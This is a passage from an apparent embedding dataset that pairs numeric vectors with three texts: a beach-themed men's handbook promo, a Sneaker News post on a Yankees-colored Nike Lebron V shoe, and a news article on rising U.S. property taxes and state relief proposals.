0.05298982188105583, 0.049040284007787704, 0.0759006217122078, 0.05271032825112343, 0.009120617993175983, 0.006272787693887949, -0.03702186420559883, -0.06514061242341995, -0.06315527111291885, 0.0637790784239769, -0.01162214856594801, -0.04176592454314232, 0.09742475301027298, 0.009941262193024158, -0.04325580224394798, -0.01391382422298193, 0.021711697801947594, 0.0378640852868557, 0.0018313266336917877, 0.01813947781920433, 0.0438871830701828, -0.0531606525182724, -0.013268006965517998, 0.011485887691378593, 0.005571977701038122, -0.020371071994304657, 0.009565936401486397, -0.06047333776950836, 0.006547804921865463, -0.04444393143057823, -0.06889721751213074, 0.005580092314630747, -0.02696589194238186, 0.044498518109321594, 0.06004532426595688, -0.05991760268807411, 0.03134012594819069, -0.01595531962811947, -0.02584592066705227, 0.03148132935166359, 0.0798826739192009, -0.03659446910023689, 0.06401559710502625, 0.14937078952789307, -0.11374356597661972, -0.05752532556653023, 0.022261682897806168, -0.05346409231424332, 0.037302423268556595, 0.05409644544124603, 0.02372477576136589, -0.012753529474139214, 8.390541841280213e-34, -0.006088690832257271, 0.11141771078109741, -0.10258273035287857, -0.005266500636935234, 0.02352697215974331, 0.06505288928747177, 0.08164822310209274, -0.0010364546906203032, -0.04231059551239014, 0.1173420324921608, -0.09786263853311539, -0.004973945673555136, -0.02996854856610298, 0.009517881087958813, -0.03404461592435837, -0.04579705744981766, -0.016170453280210495, -0.05511423945426941, 0.07716168463230133, -0.045554764568805695, 0.017725517973303795, 0.07905742526054382, 0.0023602305445820093, 0.0698520690202713, 0.023640837520360947, -0.07939130812883377, -0.06927545368671417, -0.05725942924618721, 0.006403726991266012, 0.026484055444598198, -0.10321564227342606, -0.024252645671367645, 0.047662537544965744, 0.03148561343550682, 0.028622323647141457, -0.01100078970193863, -0.05780777335166931, -0.003197651356458664, -0.007320795673877001, -0.01927466131746769, 0.012572992593050003, 0.05376153811812401, -0.09965616464614868, 0.010797896422445774, 0.01844218745827675, -0.026375629007816315, -0.004141558893024921, -0.014936823397874832, -0.019830698147416115, 0.024526963010430336, 0.00015545538917649537, 0.050101928412914276, 0.011174258776009083, -0.07407448440790176, -0.00039645328070037067, 0.025000067427754402, 0.03596099093556404, 0.008185476064682007, 0.03738730400800705, 0.03775106370449066, 0.024456558749079704, 0.018897822126746178, -0.055990446358919144, 0.05590961501002312, -0.08472944796085358, 0.03967268392443657, -0.0024098127614706755, -0.019553260877728462, -0.0024871826171875, -0.00471927085891366, 0.02931552194058895, -0.017486920580267906, 0.009848760440945625, 0.008244293741881847, -0.027155043557286263, -0.030843133106827736, -0.0007698130793869495, 0.05980459228157997, 0.030972065404057503, -0.032952792942523956, 0.0226938184350729, -0.003407879499718547, 0.1321532130241394, -0.03642098233103752, 0.03680932894349098, -0.017529062926769257, 0.054632727056741714, 0.006045611575245857, 0.03206472098827362, 0.01588406227529049, -0.028292793780565262, 0.051812950521707535, -0.005710989702492952, 0.06451551616191864, 0.08492915332317352, -1.9763195301161487e-33, -0.10641289502382278, -0.05453411489725113, 0.0011373042361810803, -0.08755173534154892, -0.09955570846796036, -0.0705840215086937, -0.027336331084370613, 0.043086592108011246, 0.020081263035535812, -0.049504637718200684, -0.013638585805892944, -0.07669874280691147, -0.0205922182649374, -0.033648740500211716, 0.01680961437523365, -0.05435126647353172, 0.008165535517036915, -0.008421210572123528, 0.03232557699084282, -0.000983751961030066, 0.0651344507932663, 0.01684100367128849, 0.0006859510904178023, 0.1005442813038826, -0.023039959371089935, -0.008020603097975254, 0.08176379650831223, -0.018688349053263664, 0.05714994668960571, 0.07499437034130096, -0.08488909900188446, -0.10146086663007736, -0.012722906656563282, 0.06348278373479843, 0.06179226189851761, 0.028361499309539795, 0.04968486726284027, 0.07562726736068726, -0.009419167414307594, -0.04795709252357483, 0.053845133632421494, -0.01379314437508583, 0.00591464526951313, -0.02443886362016201, -0.09142794460058212, 0.05877815559506416, 0.01438872143626213, -0.052435703575611115, -0.08138833194971085, -0.008725429885089397, 0.017726324498653412, -0.027628101408481598, 0.11323995888233185, -0.026775721460580826, -0.06936806440353394, 0.04753470420837402, 0.11834230273962021, 0.012385436333715916, 0.03753229230642319, -0.08733641356229782, 0.08595706522464752, 0.04397464916110039, -0.021299045532941818, -0.03964395821094513, 0.05150388553738594, 0.030790723860263824, 0.012738472782075405, -0.1090400293469429, 0.009497074410319328, 0.01884562335908413, -0.06378979980945587, -0.1230948343873024, -0.10100869089365005, -0.07510462403297424, 0.017724396660923958, 0.06473834067583084, -0.06354428827762604, 0.07032191753387451, -0.034098390489816666, 0.03854762017726898, 0.020168108865618706, 0.1048651710152626, -0.008921398781239986, -0.02914608269929886, 0.06243716925382614, 0.009168112650513649, 0.020775893703103065, -0.10711897909641266, -0.02288331650197506, -0.01887913979589939, -0.034672681242227554, -0.007209443487226963, -0.00870801042765379, 0.010276350192725658, 0.04138431325554848, -5.568053040860832e-8, 0.011446175165474415, -0.02692307159304619, -0.041103899478912354, -0.049492157995700836, 0.05066494643688202, -0.05448884144425392, 0.031960055232048035, -0.03687553107738495, 0.03331939876079559, -0.00012161315680714324, 0.048318639397621155, -0.013488074764609337, -0.07106836885213852, 0.027001965790987015, -0.032560739666223526, -0.031222742050886154, -0.05289669334888458, -0.0708620548248291, 0.023040451109409332, 0.031035397201776505, -0.04173183813691139, 0.043151967227458954, 0.03953193128108978, 0.01357965636998415, 0.02170797437429428, 0.02353391982614994, -0.03124171681702137, 0.06542929261922836, 0.10012777149677277, 0.05626840889453888, -0.04247685521841049, -0.04109632223844528, -0.03740078583359718, 0.007987994700670242, -0.07171722501516342, -0.060766443610191345, 0.005692532751709223, -0.04703443869948387, 0.0018464353634044528, 0.10069572180509567, -0.004682826343923807, 0.03239743039011955, 0.00011438976798672229, 0.031011270359158516, 0.018810518085956573, -0.045924294739961624, -0.08897583931684494, -0.05442652106285095, 0.10997610539197922, -0.04264248162508011, 0.023974083364009857, 0.025523915886878967, -0.02488042041659355, -0.07678986340761185, -0.019055837765336037, -0.10294568538665771, 0.015356098301708698, -0.00841111782938242, -0.01640995591878891, -0.019655423238873482, -0.05703156441450119, -0.05178717523813248, 0.07878272980451584, -0.08005170524120331 ]
It’s summer. It’s hot. And all you need right now, man, is a beach. Feet in the sand, beer in the hand, looking at gams. It’s an honorable pursuit. And necessary. And you deserve it. That’s why we’re proud to introduce The Gentleman’s Handbook, Vol. IV: To the Beach! Inside, we’ve packed a veritable cooler’s worth of keep-it-frosty advice. To wit: How to Make the Perfect Beach Cocktail In Defense of the Lake Beach The Swim Trunks a Man Needs Coolers: a Definitive Guide Plus much more, including our advice on how to comport one’s self on the sand — e.g., please dude, turn your rap-metal and/or Elliott Smith down. The beach thanks you. Now kick back. Relax. And enjoy The Gentleman’s Handbook, Vol. IV: To the Beach!
[ -0.018208762630820274, 0.024990804493427277, 0.0796005129814148, -0.004289280157536268, 0.03985529765486717, -0.04427733272314072, 0.09561790525913239, -0.13254325091838837, -0.05375282093882561, -0.034913573414087296, -0.0023279248271137476, -0.018670860677957535, 0.008605905808508396, -0.010961780324578285, 0.10826914757490158, 0.0003007378545589745, 0.07450584322214127, -0.042710334062576294, 0.0028006883803755045, 0.029772507026791573, -0.04031261429190636, 0.05351017042994499, -0.049857813864946365, 0.006527499761432409, -0.12424219399690628, 0.01682465709745884, 0.003056704066693783, 0.049021389335393906, -0.06098221242427826, 0.03147973120212555, -0.022709090262651443, 0.09903289377689362, -0.029240870848298073, -0.07617656886577606, -0.029357044026255608, -0.003931698389351368, 0.00029664544854313135, -0.04686695709824562, -0.03875971585512161, 0.06996066123247147, -0.056089848279953, -0.032072924077510834, 0.0956893339753151, 0.08437751978635788, 0.030313100665807724, 0.04349764809012413, 0.0203584935516119, -0.07508178800344467, 0.07233021408319473, 0.009562426246702671, -0.02000994049012661, -0.007423695642501116, 0.007625841535627842, -0.013635065406560898, -0.026029033586382866, 0.07239893078804016, -0.010250137187540531, -0.0032938728109002113, -0.009830374270677567, 0.03268712759017944, -0.0016256232047453523, 0.03359214588999748, -0.05600212141871452, 0.04688462242484093, 0.11820909380912781, -0.05840180069208145, -0.012619062326848507, 0.025540625676512718, -0.011799945496022701, 0.07889298349618912, -0.044974856078624725, -0.0006612520664930344, 0.0012196942698210478, 0.02631501294672489, -0.07403743267059326, -0.004341496154665947, -0.037968121469020844, -0.028297992423176765, 0.00770869804546237, -0.031276166439056396, -0.07404555380344391, -0.06750043481588364, 0.03935404121875763, 0.013642190024256706, -0.11405951529741287, -0.05228123813867569, 0.08544113487005234, -0.04775065928697586, 0.025005897507071495, 0.08200760930776596, -0.11374346166849136, -0.08859245479106903, -0.04400524124503136, -0.04435041919350624, -0.025281865149736404, 0.06634563952684402, -0.16339825093746185, 0.010370421223342419, -0.12777212262153625, 0.07429900020360947, 0.06702897697687149, 0.05449488386511803, -0.0247303768992424, -0.035475797951221466, 0.032634373754262924, -0.05433593690395355, -0.009889122098684311, 0.018089808523654938, -0.0060084122233092785, 0.06166980788111687, -0.028457123786211014, 0.016379542648792267, -0.01416081190109253, 0.008450920693576336, 0.059632811695337296, 0.0005867491126991808, 0.013177900575101376, -0.0017760354094207287, 0.056541558355093, 0.038107357919216156, 0.015321651473641396, 0.059268172830343246, 0.05126072093844414, 0.10568629950284958, -0.017462003976106644, -0.032478392124176025, -0.004568823147565126, -4.8565361759810646e-33, 0.04907684028148651, 0.04768439754843712, 0.0403183251619339, 0.10918474197387695, 0.12876731157302856, 0.0006118337041698396, -0.017569126561284065, -0.08463753014802933, 0.0010534310713410378, 0.054768458008766174, 0.03857618197798729, 0.051903918385505676, -0.09973513334989548, 0.010487382300198078, 0.027700379490852356, 0.018270082771778107, -0.05044358968734741, -0.09636194258928299, -0.07520317286252975, -0.07947828620672226, -0.023083114996552467, -0.009847613982856274, -0.05740909278392792, -0.02461126819252968, -0.03899967670440674, 0.025391627103090286, 0.057673949748277664, 0.01988987624645233, 0.021810805425047874, 0.03965532407164574, -0.05165818706154823, 0.0016072836006060243, 0.023359358310699463, 0.016383133828639984, 0.05603202432394028, 0.03631092980504036, -0.018010923638939857, 0.009401022456586361, 0.018976300954818726, -0.05527115613222122, -0.008457797579467297, 0.01123884692788124, -0.005705102812498808, 0.04312954843044281, -0.07313797622919083, -0.0016725026071071625, 0.020314009860157967, 0.03164558485150337, 0.001603348064236343, -0.03566568344831467, -0.03522292897105217, -0.038991376757621765, 0.05792174115777016, -0.008203081786632538, -0.0819714367389679, -0.0459277480840683, -0.017760995775461197, -0.009550957940518856, -0.07021602243185043, -0.06768184155225754, 0.052698295563459396, 0.08152187615633011, 0.012132319621741772, 0.017946088686585426, -0.08331873267889023, 0.04860685393214226, 0.01796276867389679, 0.011632910929620266, -0.041440803557634354, -0.10327255725860596, -0.06535454094409943, 0.03466083109378815, 0.04662107303738594, 0.0028249204624444246, -0.016830984503030777, 0.009883754886686802, 0.04312160983681679, -0.06113066524267197, 0.021122319623827934, -0.03102252446115017, -0.045092079788446426, 0.047701213508844376, -0.0026694738771766424, 0.05943683534860611, -0.05087237432599068, -0.07722672820091248, 0.07804964482784271, -0.03829250484704971, 0.11551269888877869, 0.02892150543630123, -0.07996586710214615, -0.025627953931689262, 0.07427365332841873, 0.011967232450842857, -0.07110504806041718, 6.074624656440894e-34, 0.06284132599830627, -0.04630625620484352, 0.04312586039304733, 0.03606237843632698, 0.08072908967733383, -0.038773540407419205, 0.02423139661550522, -0.02462124638259411, 0.04656829312443733, -0.07378125190734863, -0.13723266124725342, 0.033148474991321564, -0.005185512360185385, -0.053596362471580505, 0.08265615254640579, -0.07269474118947983, -0.057391926646232605, 0.03678815811872482, -0.019205769523978233, 0.04084905609488487, 0.0016473685391247272, 0.015363293699920177, 0.08195104449987411, -0.009496955201029778, -0.07987550646066666, -0.0029448997229337692, 0.07920677959918976, -0.027193425223231316, -0.03413645923137665, 0.005864637903869152, 0.0039303721860051155, -0.021680230274796486, -0.01824105903506279, -0.07458542287349701, -0.04910503700375557, 0.010237988084554672, 0.002296463120728731, -0.010466499254107475, -0.04891147091984749, 0.04493587091565132, -0.013954284600913525, -0.1108696460723877, -0.0030641283374279737, -0.018028464168310165, 0.010027559474110603, 0.03399511054158211, 0.003608090803027153, -0.0037793228402733803, -0.09399604052305222, -0.018647905439138412, 0.003979325294494629, -0.036182060837745667, -0.07638495415449142, -0.008890468627214432, -0.011393275111913681, -0.06324344873428345, 0.001971406163647771, 0.01103485282510519, -0.055717483162879944, 0.08303532004356384, -0.013239411637187004, 0.05098022148013115, -0.09938842058181763, 0.04361221566796303, -0.004609689582139254, 0.0322740338742733, -0.04676401615142822, -0.020557265728712082, -0.07426206022500992, 0.026903200894594193, -0.039392005652189255, -0.06387031823396683, -0.0411115437746048, -0.018300902098417282, 0.0560380294919014, -0.052966345101594925, -0.0032222759909927845, -0.04659368842840195, -0.05055632442235947, -0.0481865219771862, -0.057899560779333115, 0.01228549424558878, -0.09365377575159073, 0.10563788563013077, 0.05725574120879173, 0.035406824201345444, 0.016139866784214973, 0.05099814012646675, -0.03003569133579731, -0.007016470190137625, 0.008581461384892464, -0.04603762552142143, -0.09142895042896271, 0.04197532311081886, -0.08017747849225998, -5.740162478673483e-8, -0.026882290840148926, 0.057880938053131104, -0.005430695600807667, 0.0404629223048687, 0.01400861144065857, 0.03495116904377937, 0.031186485663056374, 0.005109040066599846, 0.06789899617433548, 0.009992451407015324, -0.0132649140432477, 0.0021107569336891174, 0.04162173345685005, 0.08693268150091171, 0.006716066971421242, 0.029541486874222755, 0.04248317703604698, -0.0046168966218829155, -0.058943286538124084, -0.03989790007472038, 0.026989348232746124, -0.04931106045842171, 0.04338746890425682, 0.005342819727957249, 0.004013786558061838, 0.08139060437679291, 0.036420583724975586, 0.04533321410417557, -0.0056134420447051525, 0.0599636435508728, -0.022062236443161964, 0.03661223128437996, -0.07028024643659592, -0.004593677818775177, -0.021890398114919662, -0.021820615977048874, 0.07862856239080429, 0.04063378646969795, 0.04679039120674133, -0.00028917338931933045, -0.129089817404747, -0.02016318589448929, 0.015079214237630367, 0.04149332642555237, 0.008852212689816952, 0.053850311785936356, 0.0559062696993351, 0.06014604493975639, -0.055150795727968216, 0.0871233344078064, 0.010743335820734501, 0.006284994073212147, 0.0683685764670372, 0.04218456521630287, 0.05212758481502533, 0.00030454673105850816, -0.026542900130152702, 0.005041216034442186, -0.0436856783926487, -0.036411482840776443, 0.06918419897556305, 0.0033082563895732164, -0.1109277680516243, -0.031506069004535675 ]
Nike Zoom Lebron V – New York Yankees – White/Navy 4.50 / 5 1 VOTES This post contains references to products from one or more of our advertisers. We may receive compensation when you click on links to those products. The opinions and information provided on this site are original editorial content of Sneaker News. Thanks to the good folks over at Kenlu, we now have great pictures of the Nike Zoom Lebron V shoes in the special New York Yankees makeup. We showed you these a few weeks back but these detailed pictures that have just surfaced do a lot more justice to the shoes than the pictures from before. Be prepared to see these at the House of Hoops in Harlem and on Lebron’s feet when he steps into the Garden on March 5, 2008 when the Cavs take on the Knicks. via Kenlu More photos below…
[ -0.048859357833862305, 0.07311535626649857, 0.06924787908792496, -0.0657225102186203, 0.06312169879674911, -0.022751370444893837, -0.0002163163444492966, 0.06377572566270828, 0.04476243630051613, 0.05520661547780037, 0.027326013892889023, 0.11165467649698257, -0.004655787255614996, 0.051012612879276276, 0.021901872009038925, 0.0019554358441382647, 0.0072212484665215015, 0.07544205337762833, -0.08387620747089386, 0.00818435475230217, 0.0735909640789032, -0.06716864556074142, -0.013904714956879616, 0.0566621758043766, 0.005510374903678894, 0.021817242726683617, 0.0627015233039856, 0.05818497762084007, -0.004749168176203966, -0.0296841561794281, -0.10763906687498093, -0.03105289302766323, -0.0068340604193508625, 0.06675592064857483, -0.0331716425716877, -0.07979613542556763, 0.027469849213957787, 0.08772221207618713, 0.028908880427479744, 0.03709718585014343, 0.010398547165095806, -0.05486594885587692, -0.051391225308179855, 0.05812564864754677, 0.0026515948120504618, -0.014020919799804688, 0.012069431133568287, 0.007452088408172131, -0.014977111481130123, 0.0940883457660675, -0.053121186792850494, -0.023858657106757164, 0.011544041335582733, -0.06096787378191948, 0.08744049072265625, 0.02759268879890442, -0.033422406762838364, 0.014298060908913612, 0.1103297770023346, -0.0246684979647398, 0.10954219102859497, -0.009418949484825134, -0.08123648911714554, -0.010024802759289742, -0.04262112081050873, -0.09369294345378876, 0.05222219228744507, -0.04391026496887207, -0.06295015662908554, -0.04497841000556946, 0.07284124940633774, 0.07167229056358337, 0.04224563017487526, -0.00592667143791914, -0.04410114884376526, 0.05257594957947731, -0.05400058627128601, -0.00024135290004778653, -0.016282377764582634, 0.05785702168941498, 0.1023482009768486, -0.05343529209494591, -0.033382758498191833, 0.057750020176172256, -0.06711860746145248, 0.044441934674978256, -0.09222347289323807, -0.030659355223178864, 0.0291049275547266, -0.051066115498542786, -0.10844346135854721, -0.0489383339881897, -0.046116407960653305, -0.04969930648803711, -0.03933660313487053, 0.007813614793121815, -0.05697242170572281, -0.07094885408878326, 0.03901577368378639, 0.04759597405791283, 0.02225816808640957, 0.003898617345839739, 0.01953715831041336, 0.01474601961672306, 0.06716609001159668, 0.013183957897126675, 0.004386646207422018, 0.04745910316705704, 0.030354946851730347, 0.1001846119761467, 0.005690878722816706, 0.02985288016498089, -0.06396219879388809, 0.043617263436317444, -0.09107820689678192, -0.02718193084001541, -0.017288537696003914, 0.09964605420827866, 0.04926745593547821, -0.04398111253976822, -0.02821861021220684, 0.07847984880208969, 0.01640479266643524, -0.0215945802628994, -0.05336325615644455, -0.05578688159584999, -0.029813693836331367, 5.017595065091042e-33, -0.0007671746425330639, -0.01953623816370964, 0.016325879842042923, -0.017718154937028885, 0.04029377922415733, 0.018935516476631165, 0.035233721137046814, -0.016869617626070976, -0.09317316114902496, -0.00950343906879425, -0.06955032795667648, 0.04332438483834267, -0.01142294891178608, -0.010071265511214733, 0.026561565697193146, -0.02861114591360092, 0.013849889859557152, -0.07887578755617142, -0.0913350060582161, 0.010606065392494202, 0.0512567013502121, -0.025718817487359047, 0.08169668912887573, 0.10025487095117569, -0.032534100115299225, -0.07676556706428528, -0.01838194951415062, -0.005289742257446051, -0.02697962522506714, 0.016751155257225037, 0.0005292437272146344, 0.02152741327881813, -0.00007474949234165251, -0.006219710223376751, -0.03928976505994797, -0.025482764467597008, 0.031172461807727814, -0.025729870423674583, 0.0051781004294753075, -0.03893148526549339, 0.021005960181355476, -0.001621820847503841, -0.06102875620126724, -0.025189096108078957, -0.045065779238939285, 0.0806812047958374, -0.025921575725078583, 0.08472210168838501, -0.034991879016160965, -0.051617346704006195, 0.0406426377594471, 0.005137926433235407, -0.0005315187154337764, -0.10493531823158264, 0.009108493104577065, -0.08512328565120697, 0.04507787525653839, -0.03377724066376686, -0.01373705267906189, 0.05166667699813843, -0.003120730398222804, 0.03516639769077301, -0.024795586243271828, 0.054801274091005325, -0.049060262739658356, -0.04480913281440735, -0.0030796886421740055, 0.03486935794353485, 0.01221027784049511, 0.016398154199123383, 0.024438196793198586, 0.033649686723947525, -0.011812213808298111, 0.015518932603299618, 0.006626511923968792, -0.08223450183868408, -0.05005241930484772, 0.0748443454504013, 0.025199836120009422, -0.005315226037055254, 0.029847566038370132, -0.011331849731504917, 0.04034288972616196, 0.01715981774032116, -0.05375414341688156, -0.03590613976120949, -0.037908654659986496, 0.005930843763053417, -0.01388956792652607, 0.004123818129301071, -0.10262307524681091, 0.01628405973315239, -0.036235321313142776, -0.01778610795736313, -0.043259453028440475, -7.46718019212076e-33, -0.00544802937656641, 0.042049113661050797, 0.08542150259017944, 0.07904887199401855, 0.006372642703354359, 0.061535708606243134, 0.04617927223443985, 0.06708767265081406, 0.025119595229625702, -0.03591705858707428, 0.00574831385165453, 0.018342580646276474, -0.04164810851216316, 0.04167773947119713, 0.027481399476528168, 0.0005334684392437339, -0.0127094192430377, -0.006745372898876667, 0.01118866354227066, 0.014139266684651375, 0.09859984368085861, -0.008028609678149223, 0.01889883726835251, 0.02926632948219776, -0.05053522437810898, -0.06946717947721481, 0.07891207933425903, 0.06914965808391571, -0.16178978979587555, 0.09033603221178055, 0.06028355285525322, 0.0018959876615554094, 0.05742161348462105, -0.02446732297539711, -0.00015970882668625563, 0.0008994676754809916, -0.06708913296461105, -0.0155935762450099, 0.07848633825778961, -0.039054542779922485, 0.019491072744131088, -0.08238793164491653, 0.014988434500992298, -0.03016958199441433, 0.02406909130513668, -0.05374991521239281, 0.024828677996993065, -0.011835034936666489, 0.015711862593889236, -0.05580856278538704, -0.042925771325826645, 0.031636595726013184, -0.09982528537511826, 0.09202593564987183, -0.07149346172809601, -0.037205472588539124, -0.10382717102766037, 0.05464659258723259, 0.03277409076690674, 0.0032864909153431654, -0.02018679492175579, -0.027556495741009712, -0.11092612147331238, -0.03822210058569908, -0.013445299118757248, 0.049742989242076874, 0.03704205900430679, -0.03973779454827309, -0.022511955350637436, -0.04439806193113327, 0.025240981951355934, -0.06876344233751297, 0.04619143530726433, 0.01706150732934475, -0.039696574211120605, -0.03471002355217934, -0.009147081524133682, 0.07427653670310974, 0.001432653865776956, 0.06788170337677002, 0.03519049286842346, -0.027146311476826668, -0.07605598121881485, 0.0382767915725708, 0.06609813123941422, 0.11433148384094238, 0.042852357029914856, 0.02736973576247692, -0.0536850206553936, 0.036366675049066544, 0.06630988419055939, -0.007335127796977758, 0.016010494902729988, 0.009654974564909935, 0.0725824311375618, -5.301710004346205e-8, 0.05208538472652435, 0.12750375270843506, 0.03170407935976982, 0.04743869602680206, -0.011520802974700928, -0.001135513768531382, 0.026378275826573372, 0.004814741667360067, 0.05229104310274124, 0.04121952876448631, -0.004205872304737568, -0.0220524650067091, -0.023500561714172363, 0.0675637274980545, 0.017968837171792984, 0.031500108540058136, -0.07369408011436462, 0.06827808171510696, -0.0056877718307077885, 0.03701673448085785, -0.05554262921214104, -0.035282403230667114, 0.06148736551403999, 0.046722181141376495, -0.020086620002985, -0.10308033972978592, -0.14934027194976807, -0.0918082520365715, -0.017271097749471664, -0.012826806865632534, 0.011630700901150703, 0.02062240242958069, 0.0027802607510238886, -0.10038763284683228, -0.058141522109508514, -0.03284963592886925, -0.04860454052686691, -0.03354370594024658, 0.10212158411741257, -0.05410533398389816, -0.051954396069049835, -0.09853421151638031, -0.0050845458172261715, 0.020411048084497452, -0.03427921235561371, -0.06265948712825775, 0.07098063081502914, -0.026169447228312492, -0.1802583783864975, -0.0025257118977606297, -0.011119023896753788, 0.019798606634140015, 0.007122362032532692, -0.0054527767933905125, 0.011063016019761562, -0.07835516333580017, -0.011527366936206818, 0.014893213286995888, -0.018609028309583664, -0.0015701770316809416, 0.02568460814654827, -0.03597070276737213, -0.07359638065099716, 0.002983467886224389 ]
Democratic Gov. Andrew Cuomo of New York speaks to reporters about his proposal to offer a $1.7 billion property tax credit for homeowners and renters. His was among proposals in several states this year to provide tax relief for property taxpayers. (AP) With some of the highest median property taxes in the nation, it’s no surprise that relief is at the top of many political agendas in New York, Connecticut and New Jersey. Counties that surround New York City in those three states account for 18 of the 20 highest-taxed counties in the nation, according to a Stateline analysis of the U.S. Census’ 2013 American Community Survey data, which is the latest available. But they aren’t the only states where homeowners feel pressure from property taxes, which are rising faster than inflation nationally and prompting lawmakers to look for ways to provide relief. Median property taxes rose 57 percent from $1,334 in 2000 to $2,090 in 2013, while inflation was only 35 percent during the period. (See the map for the latest median property taxes in each state, and the county with the highest median property taxes in each state.) Texas lawmakers, for instance, are debating as much as a $2.2 billion cut in property taxes. The median tax bill there is about $2,500. That bill, however, is only about a third of the $7,300 for median property tax New Jersey, and a quarter of the tax bill property owners pay in Westchester County, New York, which has the highest median levy of $10,000. “If a New Yorker heard about a property tax bill in Texas, he would say. ‘You have nothing to complain about,’” said Scott Drenkard, an economist at the Tax Foundation, a nonpartisan tax policy research group. “But Texans complain about property taxes quite a bit. If you ask them what needs to be cut, the average Texan would say it’s property taxes. It’s the tax policymakers hear the most about from their constituents. It’s the most hated tax.” Although states generally don’t levy property taxes (Arizona did until 1996, and Minnesota taxes some commercial and seasonal property), state lawmakers routinely look for ways to ease them at the local level with caps, subsidies, exemptions, or changes in the balance between commercial and residential tax rates. In addition to New York, Connecticut and Texas, relief proposals have been up for debate in Pennsylvania, Maine and Nebraska this year. In New York, Democratic Gov. Andrew Cuomo talked of how “middle- and lower-income families (are) struggling under the crushing weigh of property taxes” in January, when he announced a plan for $1.7 billion in tax credits for qualifying homeowners and renters. The legislature removed Cuomo’s proposed credit from the state budget in March. But Cuomo has said he’s continuing to negotiate it with legislative leaders and a compromise may be possible next month. The Connecticut Legislature is considering a bill that would provide property tax relief by giving towns more money from state sales tax revenue. The state issued a report last year showing property taxes were the largest component of taxes collected in the state, raising $9.5 billion annually compared to $5.8 billion in income taxes and $3.4 billion in sales taxes. In New Jersey, budget constraints last year forced the state to postpone scheduled property tax discounts for elderly, disabled and low-income homeowners, but they’re included in tax bills mailed out this month. A report this year by the state League of Municipalities concluded that property taxes would have to drop 35 percent to bring them into line with comparable suburbs of New York City and Philadelphia. Pennsylvania’s Democratic Gov. Tom Wolf has proposed increases in state income tax and sales taxes to help fund $3.8 billion in property tax relief next year. Lawmakers are continuing to review the proposal. Maine is considering a plan from Republican Gov. Paul LePage that would remove the property tax exemption that some nonprofits now have starting in 2019. In Nebraska, plans to relieve taxes, for farmers especially, appear dead this year and instead will be studied. In Texas, lawmakers are still debating property tax breaks. Republican Gov. Greg Abbott proposed spending $2.2 billion in state money to reimburse local schools for lost revenue from property tax relief. Relief Not Always Relief Nationwide, about 75 percent of local tax revenue comes from property taxes, according to a report by the Tax Policy Center in conjunction with the Brookings Institution and the Urban Institute. The percentages range from 32 percent in the District of Columbia and 43 percent in Alabama, to 99 percent in Maine and New Hampshire. About half of the $446 billion collected from property taxes annually goes to schools, according to a 2007 estimate by the Lincoln Institute of Land Policy, a think tank focused on land use and taxation, which tracks property tax rates by state and tax relief programs up to 2013. The rest goes to police, fire, streets and other local government operations and services. Capping or cutting property taxes, while popular, doesn’t always provide taxpayers overall relief, however. Drenkard, the Tax Foundation economist, said many attempts at relieving the burden of property taxes only serve to shift the costs of government to income or other taxes. Because school taxes are such a high proportion of the total property tax bill, many states have started there, offering some homeowners a state subsidy in the form of tax credits or rebates, lightening the load with more state aid to schools or giving homeowners breaks by raising taxes on commercial property. A New York state program called School Tax Relief (STAR), has offered some homeowners reduced school taxes through tax credits since 1998, with the lost revenue made up by higher state aid to schools. A 2010 study by Georgia State University’s Fiscal Research Center noted that most comprehensive efforts to overhaul state taxes, including property taxes, have remained on the drawing board. “Very few of the changes proposed appear to have been adopted,” the study concluded about efforts during the decade of the 2000s. New York Has Highest Rates Although New Jersey has the highest median annual property tax at $7,331, the counties with the highest rates are in New York. Suburban Westchester is the only county in the nation where the median burden is $10,000 or more. Nearby Rockland and Nassau counties are not far behind at $9,667 and $9,522, respectively. (At the bottom is the state of Alabama, where median property taxes are $532. There are 23 counties, 13 of them in Louisiana, where median taxes are less than $200.) Property tax relief has always been difficult in the New York City suburbs, said Gregory Holtz, a public administration professor at Pace University in Westchester County. Because wealth is so high and homes cost so much in affluent areas, there may not be enough outrage to fuel changes. “There’s very little potential for reform in New York state,” Holtz said. “Our taxes haven’t gotten that high yet. We’re going to have to be completely overburdened. When taxes are late or going into default, that’s a true sign of tax revolt or reform, and that’s not happening yet.”
[ 0.05261819437146187, -0.08721262216567993, 0.08230632543563843, 0.03922150284051895, 0.023540155962109566, -0.022065920755267143, 0.012623452581465244, 0.011810626834630966, -0.0922347903251648, 0.0017573736840859056, 0.0061827246099710464, 0.0017729764804244041, -0.042391225695610046, 0.024920109659433365, 0.019971173256635666, 0.12153279036283493, 0.014634824357926846, 0.008760537020862103, 0.01262493897229433, 0.12378844618797302, 0.12604191899299622, 0.0007237099343910813, 0.07280838489532471, -0.023173438385128975, 0.1741345226764679, -0.008276312611997128, 0.014861516654491425, -0.04188163951039314, -0.02519005350768566, -0.009862501174211502, 0.004333151038736105, -0.03991071879863739, -0.01718856394290924, 0.018669048324227333, 0.103509820997715, 0.01710561104118824, 0.06981883198022842, 0.009034339338541031, 0.040589626878499985, 0.016529619693756104, -0.02420118823647499, -0.023227140307426453, 0.018609993159770966, -0.007676810026168823, -0.05498272925615311, 0.00050856958841905, 0.06943905353546143, 0.026893550530076027, 0.03222883865237236, 0.053535740822553635, -0.031764429062604904, 0.1251603215932846, 0.04041276499629021, 0.02862604148685932, 0.049085844308137894, -0.058907926082611084, -0.02459387667477131, 0.05358076095581055, 0.00446875486522913, -0.030348604544997215, -0.03632006049156189, -0.007861142978072166, 0.0155879445374012, -0.019461888819932938, 0.04246070608496666, -0.005471373442560434, -0.020214872434735298, -0.024044843390583992, -0.13000474870204926, -0.07952930778265, 0.03289330005645752, 0.04344569519162178, 0.05838664248585701, -0.06632234156131744, 0.062375325709581375, -0.042054034769535065, -0.024610185995697975, 0.07931046932935715, -0.0005733587895520031, -0.043914876878261566, 0.04026924446225166, 0.00037160125793889165, -0.02442905679345131, -0.01731409691274166, -0.046356022357940674, -0.021729635074734688, -0.07342638820409775, 0.03896166756749153, 0.07547851651906967, 0.07616539299488068, 0.03733566030859947, 0.021237429231405258, -0.030700532719492912, -0.026754310354590416, -0.022789375856518745, 0.05596921965479851, 0.0361565537750721, -0.05360077694058418, -0.014590381644666195, 0.058157265186309814, -0.02437567338347435, 0.007984086871147156, 0.002841325243934989, 0.00850248895585537, 0.063073068857193, -0.035429880023002625, -0.011708135716617107, -0.00768241984769702, -0.07530590146780014, 0.012763729318976402, 0.016576357185840607, -0.014779816381633282, -0.04124939814209938, 0.0016259296098724008, -0.02381799928843975, -0.04536275565624237, 0.07198409736156464, -0.018751101568341255, 0.06576256453990936, -0.085833340883255, -0.0075746625661849976, 